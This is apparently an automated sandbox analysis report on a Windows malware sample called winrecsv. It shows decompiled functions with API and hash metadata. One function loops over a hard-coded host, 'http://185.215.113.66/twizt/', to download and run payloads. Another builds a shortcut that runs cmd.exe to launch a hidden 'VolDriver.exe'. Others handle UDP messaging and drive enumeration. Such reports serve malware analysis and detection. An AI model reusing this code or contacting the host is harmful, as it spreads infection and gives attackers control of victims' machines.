                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 2251373460-0
                                                                                  • Opcode ID: d9072ebd16b6812de4560c3d06914d0ae5d8c789f3c20ec82b6015f19e15eb00
                                                                                  • Instruction ID: 5aaab35954c252b20d942d79868cba7d8a41f7cfd36b01251640d95963f0b6d7
                                                                                  • Opcode Fuzzy Hash: d9072ebd16b6812de4560c3d06914d0ae5d8c789f3c20ec82b6015f19e15eb00
                                                                                  • Instruction Fuzzy Hash: 23311E74A00208EFDB04DF94D889F9EBBB5FF48314F1081A9E905A7391D779AA81CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00407CC0(signed int _a4, signed int _a8) {
                                                                                  
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 | _a4;
                                                                                  				_a8 = _a8 | _a8;
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 & 0x0000ffff | _a4 & 0xffff0000;
                                                                                  				_a8 = _a8 & 0x0000ffff | _a8 & 0xffff0000;
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 & 0x00ff00ff | _a4 & 0xff00ff00;
                                                                                  				_a8 = _a8 & 0x00ff00ff | _a8 & 0xff00ff00;
                                                                                  				return _a4;
                                                                                  			}



                                                                                  0x00407ccd
                                                                                  0x00407cde
                                                                                  0x00407ce7
                                                                                  0x00407cea
                                                                                  0x00407d00
                                                                                  0x00407d1c
                                                                                  0x00407d25
                                                                                  0x00407d28
                                                                                  0x00407d3e
                                                                                  0x00407d5a
                                                                                  0x00407d63
                                                                                  0x00407d66
                                                                                  0x00407d72

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl_aullshr
                                                                                  • String ID:
                                                                                  • API String ID: 673498613-0
                                                                                  • Opcode ID: 10d828046bdec3bb739cc6049cde8a14431ccfa9158b05d7d18409f95d473af6
                                                                                  • Instruction ID: 2c2ab6fddce176d3a51b6a04538834b606437382d20241cd374fb35f0ceee124
                                                                                  • Opcode Fuzzy Hash: 10d828046bdec3bb739cc6049cde8a14431ccfa9158b05d7d18409f95d473af6
                                                                                  • Instruction Fuzzy Hash: B8111F32504518AB8B20EF5EC88268ABBD6EF84361B15C136FC2CDF759D634D9514BD4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E00405900() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				signed int _v44;
                                                                                  				char _v148;
                                                                                  				intOrPtr _v152;
                                                                                  				intOrPtr _v156;
                                                                                  				intOrPtr _v160;
                                                                                  				intOrPtr _v164;
                                                                                  				intOrPtr _v168;
                                                                                  				intOrPtr _v172;
                                                                                  				signed int _v176;
                                                                                  				signed char _t36;
                                                                                  				void* _t46;
                                                                                  				void* _t47;
                                                                                  
                                                                                  				_v44 = 0;
                                                                                  				_v40 = 0;
                                                                                  				_v36 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v28 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v172 = 0x411138;
                                                                                  				_v168 = 0x41113c;
                                                                                  				_v164 = 0x411140;
                                                                                  				_v160 = 0x411144;
                                                                                  				_v156 = 0x411148;
                                                                                  				_v152 = 0x41114c;
                                                                                  				while(1) {
                                                                                  					Sleep(0x3e8);
                                                                                  					_v176 = 0;
                                                                                  					while(_v176 < 6) {
                                                                                  						Sleep(0x3e8);
                                                                                  						_push( *((intOrPtr*)(_t46 + _v176 * 4 - 0xa8)));
                                                                                  						_push("http://185.215.113.66/twizt/");
                                                                                  						wsprintfA( &_v148, "%s%s");
                                                                                  						_t36 = E0040D7F0( &_v148, _t46 + _v176 * 4 - 0x28);
                                                                                  						_t47 = _t47 + 0x18;
                                                                                  						if((_t36 & 0x000000ff) == 1) {
                                                                                  							E0040D890( &_v148, 0);
                                                                                  							_t47 = _t47 + 8;
                                                                                  						}
                                                                                  						_v176 = _v176 + 1;
                                                                                  					}
                                                                                  					Sleep(0xdbba0);
                                                                                  				}
                                                                                  			}
























                                                                                  0x00405909
                                                                                  0x00405912
                                                                                  0x00405915
                                                                                  0x00405918
                                                                                  0x0040591b
                                                                                  0x0040591e
                                                                                  0x00405921
                                                                                  0x00405924
                                                                                  0x00405927
                                                                                  0x0040592a
                                                                                  0x0040592d
                                                                                  0x00405937
                                                                                  0x00405941
                                                                                  0x0040594b
                                                                                  0x00405955
                                                                                  0x0040595f
                                                                                  0x00405969
                                                                                  0x0040596e
                                                                                  0x00405974
                                                                                  0x0040598f
                                                                                  0x0040599d
                                                                                  0x004059b0
                                                                                  0x004059b1
                                                                                  0x004059c2
                                                                                  0x004059dd
                                                                                  0x004059e2
                                                                                  0x004059eb
                                                                                  0x004059f6
                                                                                  0x004059fb
                                                                                  0x004059fb
                                                                                  0x00405989
                                                                                  0x00405989
                                                                                  0x00405a05
                                                                                  0x00405a05

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$wsprintf
                                                                                  • String ID: %s%s$http://185.215.113.66/twizt/
                                                                                  • API String ID: 3195947292-3378761964
                                                                                  • Opcode ID: 073bb2fb0fef4dcd1ca273c0c354560f53e1d9e1eca1e683211fec216546dafb
                                                                                  • Instruction ID: 33ee1419d531fd34fd9c2865182aea181f8c03b5f59c5093f7aa5c1a3f23e5cd
                                                                                  • Opcode Fuzzy Hash: 073bb2fb0fef4dcd1ca273c0c354560f53e1d9e1eca1e683211fec216546dafb
                                                                                  • Instruction Fuzzy Hash: 7F2151B0D00318EFDB50DFA4CD45BDEBBB4BB09304F5081AAD64DB6281E7785A848F69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E0040DF70(int __eax, long _a4, void* _a8, intOrPtr _a12, short _a16) {
                                                                                  				short _v6;
                                                                                  				short _v10;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				short _v20;
                                                                                  				short _v22;
                                                                                  				int* _v24;
                                                                                  				char _v25;
                                                                                  				char _v29;
                                                                                  				int* _v52;
                                                                                  				char _v53;
                                                                                  				short _t30;
                                                                                  				short _t35;
                                                                                  				long _t38;
                                                                                  				int* _t45;
                                                                                  				intOrPtr* _t50;
                                                                                  				void* _t60;
                                                                                  				int _t64;
                                                                                  				long _t67;
                                                                                  
                                                                                  				_t50 = _a4;
                                                                                  				_t64 = __eax;
                                                                                  				_t30 = 0;
                                                                                  				_v25 = 0;
                                                                                  				if(_t50 == 0 ||  *_t50 != 0x756470 || _a8 == 0 || __eax == 0) {
                                                                                  					L12:
                                                                                  					return _t30;
                                                                                  				} else {
                                                                                  					_t60 = __eax + 4;
                                                                                  					_t45 = E00408E60(_t60);
                                                                                  					_t6 =  &(_t45[1]); // 0x4
                                                                                  					_v24 = _t45;
                                                                                  					 *_t45 = _t64;
                                                                                  					memcpy(_t6, _a8, _t64);
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_v10 = 0;
                                                                                  					_v6 = 0;
                                                                                  					_t35 = _a16;
                                                                                  					_v20 = 2;
                                                                                  					__imp__#9(_t35);
                                                                                  					_v22 = _t35;
                                                                                  					_v20 = _a12;
                                                                                  					if(_t60 == 0) {
                                                                                  						L10:
                                                                                  						_v29 = 1;
                                                                                  						E00408FB0(_t45);
                                                                                  						return _v29;
                                                                                  					} else {
                                                                                  						while(1) {
                                                                                  							_t38 = _a4;
                                                                                  							__imp__#20( *((intOrPtr*)(_t38 + 8)), _t45, _t60, 0,  &_v24, 0x10);
                                                                                  							_t67 = _t38;
                                                                                  							if(_t67 == 0xffffffff) {
                                                                                  								break;
                                                                                  							}
                                                                                  							InterlockedExchangeAdd(_a4 + 0x1c, _t67);
                                                                                  							_t60 = _t60 - _t67;
                                                                                  							_t45 = _t45 + _t67;
                                                                                  							if(_t60 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_v53 = 1;
                                                                                  								E00408FB0(_v52);
                                                                                  								return _v53;
                                                                                  							}
                                                                                  							goto L13;
                                                                                  						}
                                                                                  						if(_t60 != 0) {
                                                                                  							E00408FB0(_v52);
                                                                                  							_t30 = _v53;
                                                                                  							goto L12;
                                                                                  						} else {
                                                                                  							_t45 = _v52;
                                                                                  							goto L10;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L13:
                                                                                  			}






















                                                                                  0x0040df79
                                                                                  0x0040df7e
                                                                                  0x0040df80
                                                                                  0x0040df83
                                                                                  0x0040df89
                                                                                  0x0040e08a
                                                                                  0x0040e090
                                                                                  0x0040dfad
                                                                                  0x0040dfad
                                                                                  0x0040dfb6
                                                                                  0x0040dfbd
                                                                                  0x0040dfc1
                                                                                  0x0040dfc5
                                                                                  0x0040dfc7
                                                                                  0x0040dfce
                                                                                  0x0040dfd2
                                                                                  0x0040dfd6
                                                                                  0x0040dfda
                                                                                  0x0040dfdf
                                                                                  0x0040dfeb
                                                                                  0x0040dff0
                                                                                  0x0040dff9
                                                                                  0x0040dffe
                                                                                  0x0040e004
                                                                                  0x0040e060
                                                                                  0x0040e061
                                                                                  0x0040e066
                                                                                  0x0040e078
                                                                                  0x0040e006
                                                                                  0x0040e006
                                                                                  0x0040e006
                                                                                  0x0040e018
                                                                                  0x0040e01e
                                                                                  0x0040e023
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e02d
                                                                                  0x0040e033
                                                                                  0x0040e035
                                                                                  0x0040e039
                                                                                  0x00000000
                                                                                  0x0040e03b
                                                                                  0x0040e040
                                                                                  0x0040e045
                                                                                  0x0040e057
                                                                                  0x0040e057
                                                                                  0x00000000
                                                                                  0x0040e039
                                                                                  0x0040e05a
                                                                                  0x0040e07e
                                                                                  0x0040e083
                                                                                  0x00000000
                                                                                  0x0040e05c
                                                                                  0x0040e05c
                                                                                  0x00000000
                                                                                  0x0040e05c
                                                                                  0x0040e05a
                                                                                  0x0040e004
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • memcpy.NTDLL(00000004,00000000,?,?), ref: 0040DFC7
                                                                                  • htons.WS2_32(?), ref: 0040DFF0
                                                                                  • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0040E018
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E02D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                  • String ID: pdu
                                                                                  • API String ID: 2164660128-2320407122
                                                                                  • Opcode ID: ad203699c0f73e1d20fa981d9dd844b3e240f33b07fa194a24806bbeb4069567
                                                                                  • Instruction ID: d66807eb1e7b0d5154e21252e4693ec0aa38c6c5b5b9df1ad79a440d19662bd5
                                                                                  • Opcode Fuzzy Hash: ad203699c0f73e1d20fa981d9dd844b3e240f33b07fa194a24806bbeb4069567
                                                                                  • Instruction Fuzzy Hash: 8B31F2362043119FC710DF69D880A9BB7E4AFC9714F04497EF99897381DA7489198BEB
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 54%
                                                                                  			E00404980(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                  				intOrPtr _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				short _v540;
                                                                                  				char* _t37;
                                                                                  				intOrPtr _t42;
                                                                                  
                                                                                  				__imp__CoInitialize(0);
                                                                                  				_t37 =  &_v12;
                                                                                  				__imp__CoCreateInstance(0x410348, 0, 1, 0x410338, _t37);
                                                                                  				_v8 = _t37;
                                                                                  				if(_v8 >= 0 && _v12 != 0) {
                                                                                  					wsprintfW( &_v540, L"/c start .\\%s & start .\\%s\\VolDriver.exe", 0x4140cc, 0x4140cc);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x50))))(_v12, L"%windir%\\System32\\cmd.exe");
                                                                                  					_t42 =  *_v12;
                                                                                  					_t13 = _t42 + 0x44; // 0xffed0c85
                                                                                  					 *((intOrPtr*)( *_t13))(_v12, _a8, _a12);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x3c))))(_v12, 7);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x2c))))(_v12,  &_v540);
                                                                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x410358,  &_v16);
                                                                                  					if(_v8 >= 0 && _v16 != 0) {
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x18))))(_v16, _a4, 1);
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                  					}
                                                                                  					return  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                  				}
                                                                                  				return _t37;
                                                                                  			}









                                                                                  0x0040498b
                                                                                  0x00404991
                                                                                  0x004049a3
                                                                                  0x004049a9
                                                                                  0x004049b0
                                                                                  0x004049d6
                                                                                  0x004049f0
                                                                                  0x004049fd
                                                                                  0x00404a03
                                                                                  0x00404a06
                                                                                  0x00404a16
                                                                                  0x00404a2b
                                                                                  0x00404a43
                                                                                  0x00404a4a
                                                                                  0x00404a64
                                                                                  0x00404a72
                                                                                  0x00404a72
                                                                                  0x00000000
                                                                                  0x00404a80
                                                                                  0x00404a85

                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 0040498B
                                                                                  • CoCreateInstance.OLE32(00410348,00000000,00000001,00410338,?), ref: 004049A3
                                                                                  • wsprintfW.USER32 ref: 004049D6
                                                                                  Strings
                                                                                  • /c start .\%s & start .\%s\VolDriver.exe, xrefs: 004049CA
                                                                                  • %windir%\System32\cmd.exe, xrefs: 004049DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstancewsprintf
                                                                                  • String ID: %windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                                  • API String ID: 2038452267-2473591295
                                                                                  • Opcode ID: 340fd1f3452e10be6b46804f1b08d5f979aa4967310c1d27f755dd35910e8895
                                                                                  • Instruction ID: 67ce22acd86be46554e689b187cabead6fbc8e336e1921382d0bb77877987f96
                                                                                  • Opcode Fuzzy Hash: 340fd1f3452e10be6b46804f1b08d5f979aa4967310c1d27f755dd35910e8895
                                                                                  • Instruction Fuzzy Hash: F431BA75A40208EFCB04DF98C885EDEB7B5EF88704F108299E619A73A5D774AE81CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004099A0(void* __eax) {
                                                                                  				void* _v8;
                                                                                  				long _v12;
                                                                                  				void* _v16;
                                                                                  				signed int _v20;
                                                                                  				long _v24;
                                                                                  				signed int _t36;
                                                                                  				void* _t38;
                                                                                  				signed int _t65;
                                                                                  
                                                                                  				if( *0x414e84 == 0) {
                                                                                  					return __eax;
                                                                                  				}
                                                                                  				_t36 =  *0x414e84; // 0x0
                                                                                  				_v12 = _t36 << 3;
                                                                                  				_t38 = E00408E60(_v12);
                                                                                  				_v8 = _t38;
                                                                                  				__eflags = _v8;
                                                                                  				if(_v8 != 0) {
                                                                                  					_v20 = 0;
                                                                                  					while(1) {
                                                                                  						__eflags = _v20 -  *0x414e84; // 0x0
                                                                                  						if(__eflags >= 0) {
                                                                                  							break;
                                                                                  						}
                                                                                  						 *((intOrPtr*)(_v8 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v20 * 4)) + 4));
                                                                                  						 *((intOrPtr*)(_v8 + 4 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v20 * 4)) + 8));
                                                                                  						_t65 = _v20 + 1;
                                                                                  						__eflags = _t65;
                                                                                  						_v20 = _t65;
                                                                                  					}
                                                                                  					_v16 = CreateFileW(0x414c40, 0x40000000, 0, 0, 2, 2, 0);
                                                                                  					__eflags = _v16 - 0xffffffff;
                                                                                  					if(_v16 != 0xffffffff) {
                                                                                  						WriteFile(_v16, _v8, _v12,  &_v24, 0);
                                                                                  						FlushFileBuffers(_v16);
                                                                                  						CloseHandle(_v16);
                                                                                  					}
                                                                                  					InterlockedExchange(0x4133b4, 0x3d);
                                                                                  					return E00408FB0(_v8);
                                                                                  				}
                                                                                  				return _t38;
                                                                                  			}











                                                                                  0x004099ad
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004099b4
                                                                                  0x004099bc
                                                                                  0x004099c3
                                                                                  0x004099cb
                                                                                  0x004099ce
                                                                                  0x004099d2
                                                                                  0x004099d8
                                                                                  0x004099ea
                                                                                  0x004099ed
                                                                                  0x004099f3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409a08
                                                                                  0x00409a1e
                                                                                  0x004099e4
                                                                                  0x004099e4
                                                                                  0x004099e7
                                                                                  0x004099e7
                                                                                  0x00409a3e
                                                                                  0x00409a41
                                                                                  0x00409a45
                                                                                  0x00409a59
                                                                                  0x00409a63
                                                                                  0x00409a6d
                                                                                  0x00409a6d
                                                                                  0x00409a7a
                                                                                  0x00000000
                                                                                  0x00409a89
                                                                                  0x00409a8f

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00414C40,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00409A38
                                                                                  • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00409A59
                                                                                  • FlushFileBuffers.KERNEL32(000000FF), ref: 00409A63
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A6D
                                                                                  • InterlockedExchange.KERNEL32(004133B4,0000003D), ref: 00409A7A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                  • String ID:
                                                                                  • API String ID: 442028454-0
                                                                                  • Opcode ID: 041b73d5b942429564a4579fd955c60e5901b8d3da01b6d0c2a702c2e683ff31
                                                                                  • Instruction ID: 85340a07573b5f562dbc2fb3f1b8785e1f65b23dd5aeba6ef7127c009f103e88
                                                                                  • Opcode Fuzzy Hash: 041b73d5b942429564a4579fd955c60e5901b8d3da01b6d0c2a702c2e683ff31
                                                                                  • Instruction Fuzzy Hash: A6317AB8A00209EBCB14CF94ED45FAEB3B5FB88300F208169E511A7391D774AE41CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 46%
                                                                                  			E004078B0(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				_v12 = _a4 | _a8 | _a12 | _a16 | _a20 | _a24;
                                                                                  				_v8 = __edx | __edx | __edx | __edx | __edx | __edx;
                                                                                  				return _v12;
                                                                                  			}





                                                                                  0x004078bb
                                                                                  0x004078be
                                                                                  0x004078ca
                                                                                  0x004078cd
                                                                                  0x004078d9
                                                                                  0x004078dc
                                                                                  0x004078e8
                                                                                  0x004078eb
                                                                                  0x004078f7
                                                                                  0x004078fa
                                                                                  0x00407906
                                                                                  0x0040790b
                                                                                  0x0040790e
                                                                                  0x0040791c

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl
                                                                                  • String ID:
                                                                                  • API String ID: 435966717-0
                                                                                  • Opcode ID: 1cbd3f30f7551ee80999496264fe97a3fccce00ee31e34d742f1e9c4e4257bfe
                                                                                  • Instruction ID: 50bcbbfbc9b263382ea6c403a771187ef31099e9fa81d89d9fbd392b00d1843e
                                                                                  • Opcode Fuzzy Hash: 1cbd3f30f7551ee80999496264fe97a3fccce00ee31e34d742f1e9c4e4257bfe
                                                                                  • Instruction Fuzzy Hash: CDF08132A01028EB8720EEEFC4428CAF7E69F88364B118136F818E7660E9709C1547F2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040E0A0(intOrPtr* __ebx, void* __edi) {
                                                                                  				void* _t8;
                                                                                  				intOrPtr* _t18;
                                                                                  				intOrPtr _t23;
                                                                                  				intOrPtr _t26;
                                                                                  				void* _t28;
                                                                                  
                                                                                  				_t18 = __ebx;
                                                                                  				if(__ebx != 0 &&  *__ebx == 0x756470) {
                                                                                  					SetEvent( *(__ebx + 0x10));
                                                                                  					WaitForSingleObject( *(__ebx + 0x14), 0xffffffff);
                                                                                  					CloseHandle( *(__ebx + 0x14));
                                                                                  					_t26 =  *((intOrPtr*)(__ebx + 0x20));
                                                                                  					if(_t26 == 0) {
                                                                                  						L6:
                                                                                  						E00409940( *((intOrPtr*)(_t18 + 8)));
                                                                                  						return E00408FB0(_t18);
                                                                                  					}
                                                                                  					do {
                                                                                  						E00408FB0( *((intOrPtr*)(_t26 + 0x18)));
                                                                                  						_t23 =  *((intOrPtr*)(_t26 + 0x1c));
                                                                                  						E00408FB0(_t26);
                                                                                  						_t28 = _t28 + 8;
                                                                                  						_t26 = _t23;
                                                                                  					} while (_t23 != 0);
                                                                                  					goto L6;
                                                                                  				}
                                                                                  				return _t8;
                                                                                  			}








                                                                                  0x0040e0a0
                                                                                  0x0040e0a2
                                                                                  0x0040e0b1
                                                                                  0x0040e0bd
                                                                                  0x0040e0c7
                                                                                  0x0040e0cd
                                                                                  0x0040e0d2
                                                                                  0x0040e0f1
                                                                                  0x0040e0f5
                                                                                  0x00000000
                                                                                  0x0040e103
                                                                                  0x0040e0d5
                                                                                  0x0040e0d9
                                                                                  0x0040e0de
                                                                                  0x0040e0e2
                                                                                  0x0040e0e7
                                                                                  0x0040e0ea
                                                                                  0x0040e0ec
                                                                                  0x00000000
                                                                                  0x0040e0f0
                                                                                  0x0040e104

                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,00009E34,0040DD0D), ref: 0040E0B1
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040E0BD
                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E0C7
                                                                                    • Part of subcall function 00408FB0: HeapFree.KERNEL32(00000000,00000000,00401192,?,00401192,?), ref: 0040900B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                  • String ID: pdu
                                                                                  • API String ID: 309973729-2320407122
                                                                                  • Opcode ID: 66e9fe8601b7ef7cd0dbcf15949e6a0ec0c00c685c3ab46f0f111c3b43d568d8
                                                                                  • Instruction ID: f8868823fc7079781ad89b5054c4351009e6be9a29e70cb83faf709a4bea03a0
                                                                                  • Opcode Fuzzy Hash: 66e9fe8601b7ef7cd0dbcf15949e6a0ec0c00c685c3ab46f0f111c3b43d568d8
                                                                                  • Instruction Fuzzy Hash: 7FF0C2B64002209BCB209F66EC84D577779AE843203044A7EFD516B38ACE78EC51C7A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004047E0(WCHAR* _a4) {
                                                                                  				int _v8;
                                                                                  				short _v1052;
                                                                                  				intOrPtr _v1056;
                                                                                  
                                                                                  				_v8 = GetDriveTypeW(_a4);
                                                                                  				_v1056 = _v8;
                                                                                  				if(_v1056 >= 2) {
                                                                                  					if(_v1056 <= 3 || _v1056 == 6) {
                                                                                  						if(QueryDosDeviceW(_a4,  &_v1052, 0x208) != 0 && StrCmpNW( &_v1052, L"\\??\\", 4) == 0) {
                                                                                  							_v8 = 1;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}






                                                                                  0x004047f3
                                                                                  0x004047f9
                                                                                  0x00404806
                                                                                  0x0040480f
                                                                                  0x00404834
                                                                                  0x0040484e
                                                                                  0x0040484e
                                                                                  0x00404834
                                                                                  0x0040480f
                                                                                  0x0040485b

                                                                                  APIs
                                                                                  • GetDriveTypeW.KERNEL32(0040489F), ref: 004047ED
                                                                                  • QueryDosDeviceW.KERNEL32(0040489F,?,00000208), ref: 0040482C
                                                                                  • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00404844
                                                                                  Strings
                                                                                  Memory Dump Source
